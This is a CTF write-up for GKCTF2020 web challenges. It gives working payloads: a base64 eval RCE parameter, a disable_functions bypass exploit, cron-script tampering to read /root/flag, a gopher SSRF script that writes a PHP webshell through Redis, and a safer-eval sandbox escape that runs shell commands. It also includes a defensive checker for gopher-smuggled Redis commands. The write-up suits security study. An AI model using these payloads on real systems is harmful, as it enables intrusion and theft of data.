
GKCTF2020-CheckIN

Base64-encode the payload and you get RCE directly:

?Ginkgo=ZXZhbCgkX1BPU1RbMV0pOw==

Testing shows the tmp directory is writable, but the flag cannot be read directly. There is, however, a readflag program in the root directory; the problem is that every function that executes system commands has been disabled, so disable_functions has to be bypassed.

Just run the exp in one go:

https://github.com/mm0r1/exploits/tree/master/php7-gc-bypass

Upload the exp to /var/tmp/3.txt and include it directly to run it.

http://ebd8d9e8-ee16-4153-8396-b65d3b3b95ac.node3.buuoj.cn/?Ginkgo=ZXZhbCgkX0dFVFsnYSddKTs=&a=var_dump(include('../../tmp/3.txt'));

echo pwn("echo /readflag > /var/tmp/a.txt");


老八小超市儿

Just search the web for a ShopXO getshell: http://www.nctry.com/1660.html

After getting a shell, the flag in the root directory turns out to be fake, and there is also a hint. I don't know what the hint is for, but there is a very obvious spot in auto.sh:

#!/bin/sh
while true; do (python /var/mail/makeflaghint.py &) && sleep 60; done

This should be a scheduled task that runs the script every 60 seconds, and we have permission to modify makeflaghint.py. Simply modifying the script lets us read /root/flag.

f = open('/root/flag','r')
f2 = open('/666.txt','w')
flag = f.read()
f2.write(flag)
f.close()
f2.close()

EZ三剑客-EzWeb

This challenge is basically the same as one from either Anheng or the Guangdong Qiangwang Cup: SSRF used to attack Redis.

Use the SSRF to probe internal IPs, then ports; it turns out to be Redis, so run the exp in one go.

import urllib
import urllib.parse
protocol="gopher://"
ip="173.138.94.11"
port="6379"
shell='\n\n<?php eval($_GET["cmd"]);?>\n\n'
filename="shell.php"
path="/var/www/html"
passwd=""
cmd=["flushall",
     "set 1 {}".format(shell.replace(" ","${IFS}")),
     "config set dir {}".format(path),
     "config set dbfilename {}".format(filename),
     "save"
     ]
if passwd:
    cmd.insert(0,"AUTH {}".format(passwd))
payload=protocol+ip+":"+port+"/_"
def redis_format(arr):
    CRLF="\r\n"
    redis_arr = arr.split(" ")
    cmd=""
    cmd+="*"+str(len(redis_arr))
    for x in redis_arr:
        cmd+=CRLF+"$"+str(len((x.replace("${IFS}"," "))))+CRLF+x.replace("${IFS}"," ")
    cmd+=CRLF
    return cmd

if __name__=="__main__":
    for x in cmd:
        payload += urllib.parse.quote(redis_format(x))
    print(payload)
gopher://173.138.94.11:6379/_%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%0A%241%0D%0A1%0D%0A%2431%0D%0A%0A%0A%3C%3Fphp%20eval%28%24_GET%5B%22cmd%22%5D%29%3B%3F%3E%0A%0A%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%243%0D%0Adir%0D%0A%2413%0D%0A/var/www/html%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%249%0D%0Ashell.php%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0A

Finally, reading the flag requires bypassing the space filter.
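As an added, defender-side counterpart to the exp above (my example, not code from the original write-up): a checker that decodes a gopher:// URL the way an SSRF egress filter or proxy-log analyser would, parses the smuggled RESP stream while honouring bulk-string lengths, and flags the CONFIG SET dir/dbfilename pair that turns Redis's RDB dump into an arbitrary file write. The sample URL is the one generated above, embedded so the code runs offline.

```python
import urllib.parse

# Constructed sample: the gopher:// SSRF URL produced by the exp in the write-up,
# embedded here so the checker can be run offline against a realistic input.
SAMPLE_URL = (
    "gopher://173.138.94.11:6379/_%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243"
    "%0D%0Aset%0D%0A%241%0D%0A1%0D%0A%2431%0D%0A%0A%0A%3C%3Fphp%20eval%28%24_GET%5B"
    "%22cmd%22%5D%29%3B%3F%3E%0A%0A%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0A"
    "set%0D%0A%243%0D%0Adir%0D%0A%2413%0D%0A/var/www/html%0D%0A%2A4%0D%0A%246%0D%0A"
    "config%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%249%0D%0Ashell.php"
    "%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0A"
)

def parse_resp(raw):
    """Parse a stream of RESP arrays ('*N' followed by N '$len' bulk strings) into
    argv lists. Lengths are honoured, so a bulk string that itself contains
    newlines (the PHP payload in the 'set' command) is recovered intact."""
    commands, pos = [], 0
    while pos < len(raw):
        if raw[pos] != "*":
            raise ValueError("expected RESP array at offset %d" % pos)
        end = raw.index("\r\n", pos)
        argc, pos = int(raw[pos + 1:end]), end + 2
        args = []
        for _ in range(argc):
            if raw[pos] != "$":
                raise ValueError("expected bulk string at offset %d" % pos)
            end = raw.index("\r\n", pos)
            length, pos = int(raw[pos + 1:end]), end + 2
            args.append(raw[pos:pos + length])
            pos += length + 2  # skip the payload and its trailing CRLF
        commands.append(args)
    return commands

def gopher_redis_commands(url):
    """Return the Redis commands smuggled in a gopher:// URL ([] for other schemes).
    A gopher path is '/' + one item-type byte ('_' for a raw TCP payload) + selector."""
    parts = urllib.parse.urlsplit(url)
    if parts.scheme.lower() != "gopher" or len(parts.path) < 2:
        return []
    return parse_resp(urllib.parse.unquote(parts.path[2:]))

def suspicious_redis_commands(commands):
    """Flag CONFIG SET dir / dbfilename: the step that redirects the RDB dump to a path
    of the attacker's choosing, which is what makes the later SAVE a file write."""
    hits = []
    for args in commands:
        lowered = [a.lower() for a in args]
        if lowered[:2] == ["config", "set"] and lowered[2:3] and lowered[2] in ("dir", "dbfilename"):
            hits.append(" ".join(args))
    return hits
```

Any outbound URL whose decoded gopher selector yields a non-empty result from `suspicious_redis_commands` is worth blocking or alerting on, regardless of which internal host it targets.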

cve版签到

?url=http://127.0.0.123%00.ctfhub.com

EZ三剑客-EzNode

const express = require('express');
const bodyParser = require('body-parser');

const saferEval = require('safer-eval'); // 2019.7/WORKER1 found a great library

const fs = require('fs');

const app = express();


app.use(bodyParser.urlencoded({ extended: false }));
app.use(bodyParser.json());

// 2020.1/WORKER2 the boss says this makes later optimization easier
app.use((req, res, next) => {
  if (req.path === '/eval') {
    let delay = 60 * 1000;
    console.log(delay);
    if (Number.isInteger(parseInt(req.query.delay))) {
      delay = Math.max(delay, parseInt(req.query.delay));
    }
    const t = setTimeout(() => next(), delay);
    // 2020.1/WORKER3 the boss told me to speed things up, so I just wrote it like this; what the others wrote is none of my damn business
    setTimeout(() => {
      clearTimeout(t);
      console.log('timeout');
      try {
        res.send('Timeout!');
      } catch (e) {

      }
    }, 1000);
  } else {
    next();
  }
});

app.post('/eval', function (req, res) {
  let response = '';
  if (req.body.e) {
    try {
      response = saferEval(req.body.e);
    } catch (e) {
      response = 'Wrong Wrong Wrong!!!!';
    }
  }
  res.send(String(response));
});

// 2019.10/WORKER1 the boss's wife says she wants to see our source code, KPI is measured by line count
app.get('/source', function (req, res) {
  res.set('Content-Type', 'text/javascript;charset=utf-8');
  res.send(fs.readFileSync('./index.js'));
});

// 2019.12/WORKER3 added this endpoint so I can check the version myself
app.get('/version', function (req, res) {
  res.set('Content-Type', 'text/json;charset=utf-8');
  res.send(fs.readFileSync('./package.json'));
});

app.get('/', function (req, res) {
  res.set('Content-Type', 'text/html;charset=utf-8');
  res.send(fs.readFileSync('./index.html'))
})

app.listen(80, '0.0.0.0', () => {
  console.log('Start listening')
});

Small trick

setInterval.constructor('return process')().mainModule.require('child_process').execSync('cat /flag').toString();
